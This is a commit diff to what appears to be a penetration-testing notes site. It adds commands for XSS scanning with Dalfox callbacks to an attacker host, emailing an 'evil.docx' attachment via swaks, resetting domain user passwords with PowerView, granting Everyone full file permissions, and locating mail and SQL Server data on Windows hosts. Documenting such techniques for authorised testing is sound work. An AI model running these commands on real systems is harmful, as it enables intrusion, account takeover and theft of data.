updated XSS

src/_includes/layouts/exploit.vto

@@ -118,10 +118,15 @@ bodyClass: body-exploit
             </div>
             <div>
                 {{# Carbon Ads #}}
-                <script
+                {{# <script
                     async type="text/javascript"
                     src="//cdn.carbonads.com/carbon.js?serve=CWYDE53L&placement=exploit-noteshdksorg"
                     id="_carbonads_js">
+                </script> #}}
+                <script
+                    async type="text/javascript"
+                    src="//cdn.carbonads.com/carbon.js?serve=CWYDE53L&placement=exploit-noteshdksorg&format=cover"
+                    id="_carbonads_js">
                 </script>
             </div>
         </div>

src/exploit/email/smtp-pentesting.md

@@ -4,7 +4,7 @@ description: It is used for sending e-mail. POP3 or IMAP are used for receiving
 tags:
     - Email
 refs:
-date: 2023-05-20
+date: 2024-09-14
 draft: false
 ---
 
@@ -68,7 +68,13 @@ telnet <target-ip> 25
 
 Commands are not case sensitive.
 
-### EHLO - list all supported enhanced functions
+### HELO - Identify SMTP Server
+
+```sh
+helo example.com
+```
+
+### EHLO - List all supported enhanced functions
 
 ```sh
 ehlo example.com
@@ -90,6 +96,19 @@ ehlo example.com
 - **TURN** - swap client and server
 - **VRFY** - check if the user exists in the SMTP server
 
+### Auth Login
+
+The `AUTH LOGIN` command allows us to login. We need to input `username/password` in **Base64**.  
+Here is the example:
+
+```bash
+AUTH LOGIN
+334 VXNlcm5hbWU6 # Base64-encoded "username:"
+dGVzdA== # Base64-encoded "test"
+334 UGFzc3dvcmQ6 # Base64-encoded "password:"
+cGFzc3dvcmQ= # Base64-encoded "password"
+```
+
 ### Messages
 
 ```sh
@@ -132,6 +151,9 @@ expn example.com
 
 ```sh
 swaks --to [email protected] --from local-user@<local-ip> --server mail.example.com --body "hello"
+
+# --attach: Attach a file
+swaks --to [email protected] --from local-user@<local-ip> --server mail.example.com --body "hello" --attach @evil.docx
 ```
 
 <br />

src/exploit/linux/privilege-escalation/index.md

@@ -14,9 +14,9 @@ draft: false
 
 There are some tools for investigating automatically.
 
-- **[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)**
-- **[Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)**
-- **[Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration)**
+- [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
+- [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
+- [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
 
 <br />
 

src/exploit/web/security-risk/xss.md

@@ -11,10 +11,38 @@ refs:
     - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
     - https://brutelogic.com.br/blog/building-xss-polyglots/
     - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-date: 2024-05-08
+date: 2024-09-14
 draft: false
 ---
 
+## Automation
+
+- [Dalfox](https://github.com/hahwul/dalfox)
+
+    ```sh
+    # -b: Callback url
+    dalfox url https://example.com/?q=test -b http://<attack-ip>:<attack-port>
+
+    # -X: Method
+    # --data: POST data
+    dalfox url https://example.com/contact -X POST --data "email=test&message=test" -b http://<attack-ip>:<attack-port>
+    ```
+
+- [XSStrike](https://github.com/s0md3v/XSStrike)
+
+    ```sh
+    # GET request
+    python xsstrike.py -u http://vulnerable.com/?param=test
+
+    # POST reqeust
+    python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
+
+    # data as JSON
+    python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
+    ```
+
+<br />
+
 <div data-pagefind-ignore>
 
 ## Payloads
@@ -364,23 +392,6 @@ We might be able to get sensitive information or change crucial data on the targ
 
 <br />
 
-## Automation
-
-**[XSStrike](https://github.com/s0md3v/XSStrike)** is a XSS scanner.
-
-```sh
-# GET request
-python xsstrike.py -u http://vulnerable.com/?param=test
-
-# POST reqeust
-python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
-
-# data as JSON
-python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
-```
-
-<br />
-
 ## Register New User with XSS
 
 If the user name is reflected in the website, we might be able to inject XSS when registration.

src/exploit/windows/active-directory/smb-pentesting.md

@@ -5,7 +5,7 @@ tags:
     - Active Directory
     - Windows
 refs:
-date: 2024-09-10
+date: 2024-09-14
 draft: false
 ---
 
@@ -402,9 +402,14 @@ You need to have two files - exploit.py, mysmb.py
 ## Launch SMB Server
 
 ```bash
-impacket-smbserver share . -smb2support -username user -password pass
+impacket-smbserver -smb2support share .
+
+# Set username/password
+impacket-smbserver -smb2support -username "user" -password "pass" share .
 ```
 
+The SMB server can be accessed at `<local-ip>/share/`
+
 ### Access from Remote Machine
 
 ```bash

src/exploit/windows/powershell/powerview.md

@@ -4,7 +4,7 @@ description: A Powershell’s script to gain network situational awareness on Wi
 tags:
     - Windows
 refs:
-date: 2022-12-01
+date: 2024-09-14
 draft: false
 ---
 
@@ -40,3 +40,15 @@ Get-NetComputer -fulldata | select operatingsystem
 # Find files or directories
 Get-ChildItem -r -Filter "*.txt" -Name
 ```
+
+<br />
+
+## Privilege Escalation
+
+### Set New Password for Existing User
+
+```powershell
+$Username = "John"
+$Password = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
+Set-DomainUserPassword -Identity $Username -AccountPassword $Password
+```

src/exploit/windows/privilege-escalation/index.md

@@ -8,7 +8,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
     - https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-07-17
+date: 2024-09-14
 draft: false
 ---
 
@@ -93,6 +93,20 @@ $PSVersionTable
 # Display only the PowerShell version.
 (Get-Host).Version
 $Host.Version
+
+# Web app folder
+dir c:\inetpub\
+
+# SQL server
+dir c:\SQLServer\Logs
+type c:\SQLServer\Logs\ERRORLOG.BAK
+
+# Email
+dir "C:\Users\<user>\AppData\Local\Microsoft\Outlook\"
+dir "C:\Users\<user>\AppData\Local\Packages\"
+dir "C:\Users\<user>\AppData\Roaming\Thudnerbird\Profiles\"
+dir "C:\Program Files\hMailServer\Data\"
+dir "C:\Program Files (x86)\hMailServer\Data\"
 ```
 
 ### Find OS Vulnerabilities
@@ -276,13 +290,6 @@ dir /q \Users\Administrator\Desktop
 # Hidden files
 dir /a:h .\
 
-# Website folder
-dir c:\inetpub\
-
-# SQL server
-dir c:\SQLServer\Logs
-type c:\SQLServer\Logs\ERRORLOG.BAK
-
 # Get contents of file
 more .\example.txt
 type .\example.txt
@@ -364,8 +371,42 @@ In Computer Management, click **"Local Users and Groups"**.
 
 <br />
 
+## Set New Password for Existing User
+
+Using **PowerView**, we may be able to set new password for existing user.
+
+```powershell
+# 1. Activate PowerView
+Import-Module .\PowerView.ps1
+. .\PowerView.ps1
+
+# 2. Set new password
+$Username = "John"
+$Password = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
+Set-DomainUserPassword -Identity $Username -AccountPassword $Password
+```
+
+<br />
+
 ## Change File Permission
 
+### From Command-Line
+
+Check the current permission:
+
+```powershell
+icacls 'C:\Path\to\file'
+```
+
+And change permission:
+
+```powershell
+icacls 'C:\Path\to\file' /grant Users:F
+icacls 'C:\Path\to\file' /grant Everyone:F
+```
+
+### From GUI
+
 1. Right-click on the file.
 2. Select the **Properties**.
 3. Click the **Security** tab.
@@ -375,13 +416,6 @@ In Computer Management, click **"Local Users and Groups"**.
 7. Enter the username in the text field.
 8. Click **OK** and **Apply**.
 
-Also we can change permissions in CommandPrompt or PowerShell.
-
-```powershell
-icacls 'C:\Path\to\file' /grant Users:F
-icacls 'C:\Path\to\file' /grant Everyone:F
-```
-
 <br />
 
 ## Take Ownership of a File (Administrators Group Required)

src/exploit/windows/service/windows-print-spooler-service.md

@@ -7,7 +7,7 @@ tags:
 refs:
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
     - https://tryhackme.com/room/printnightmarehpzqlp8
-date: 2024-05-29
+date: 2024-09-14
 draft: false
 ---
 
@@ -53,7 +53,7 @@ Filter packets with **"smb"** or **"smb2"**.
 
 <br />
 
-## PrintNightmare
+## PrintNightmare (Credential Required)
 
 This is security vulnerability to remote code execution in print spooler service.  
 It requires authentication (username/password).

src/exploit/windows/technique/download-files-in-windows.md

@@ -1,23 +1,31 @@
 ---
 title: Download Files in Windows
-description: We can download files from websites in Windows from command line, like ‘wget’ command of Linux.
+description: We can download files from websites in Windows from command line.
 tags:
     - Windows
 refs:
-date: 2024-03-26
+date: 2024-09-14
 draft: false
 ---
 
-## Using Invoke-WebRequest
+### PowerShell
 
-We can use `Invoke-WebRequest` command
-
-```bash
-# In PowerShell
+```powershell
+wget https://example.com/hello.txt -o hello.txt
+# or
 Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt
+# or
 IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt
+```
+
+### Command Prompt
+
+We need to call `powershell` or `powershell.exe` command before actual command.
 
-# In CMD, we need to call `powershell` or `powershell.exe` command.
+```powershell
+powershell wget https://example.com/hello.txt -o hello.txt
+# or
 powershell Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt
+# or
 powershell IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt
 ```

src/styles.css

@@ -241,6 +241,10 @@ td {
     @apply my-2 mx-0;
 }
 
+#exploit-content ul li a {
+    @apply underline;
+}
+
 #exploit-content ol {
     @apply mt-2 mr-0 mb-0 ml-2 list-decimal;
 }